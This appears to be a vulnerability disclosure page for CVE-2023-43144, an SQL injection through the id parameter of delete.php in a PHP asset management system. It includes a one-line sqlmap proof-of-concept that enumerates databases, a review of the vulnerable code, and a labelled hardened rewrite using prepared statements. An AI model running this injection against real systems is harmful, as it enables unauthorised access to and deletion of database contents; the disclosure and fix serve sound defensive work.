
CVE-2023-43144 PoC — Projectworldsl Assets-management-system-in-php SQL Injection Vulnerability

Associated Vulnerability
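Title: Projectworldsl Assets-management-system-in-php SQL Injection Vulnerability (CVE-2023-43144)
Description: Assets-management-system-in-php is a PHP asset management system by the individual developer projectworlds. Projectworldsl Assets-management-system-in-php version 1.0 contains a security vulnerability caused by SQL injection through the id parameter of the file delete.php.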
Description
Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php
Readme
# CVE-2023-43144

> Description

Assets Management System 1.0 is vulnerable to SQL injection via the `id` parameter in `delete.php`

> PoC

```bash
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
```

![alt text](https://github.com/Pegasus0xx/CVE-2023-43144/blob/main/PoC.png?raw=true)

> Code review (delete.php)

```php
<?php include 'core/init.php';

$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
```

There is no validation or sanitization of the `$id` variable, so any value a user supplies as the `id` parameter is passed to `delete_data()` unchanged and used directly in the SQL query.
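
A hardened form of `delete.php`, as an added example that is not code from the original repository or from the project. It assumes `$con` from `core/init.php` is a `mysqli` connection; the `delete_data_safe()` helper, the `assets` table and its `id` column are hypothetical, because the page does not show `delete_data()` or the schema.

```php
<?php
// Added example: hardened delete.php (not the project's own code).
// Assumptions: $con is a mysqli connection created in core/init.php;
// the table name `assets` and column `id` are hypothetical.
include 'core/init.php';

// Hypothetical replacement for delete_data(): the id is bound as an integer
// parameter, so it is never parsed as part of the SQL text.
function delete_data_safe(mysqli $con, int $id): bool
{
    $stmt = $con->prepare('DELETE FROM assets WHERE id = ?');
    if ($stmt === false) {
        return false; // prepare failed, nothing was executed
    }
    $stmt->bind_param('i', $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Accept only a positive decimal integer. filter_input() returns null when
// the parameter is missing and false when validation fails, so a value such
// as "4*" never reaches the database layer.
$id = filter_input(
    INPUT_GET,
    'id',
    FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]
);

if ($id === null || $id === false) {
    http_response_code(400);
    exit('Invalid id');
}

delete_data_safe($con, $id);
header('Location: home.php');
exit;
```

Input validation and the bound parameter are independent layers here: the prepared statement alone removes the injection, and the integer check rejects malformed requests before any query runs.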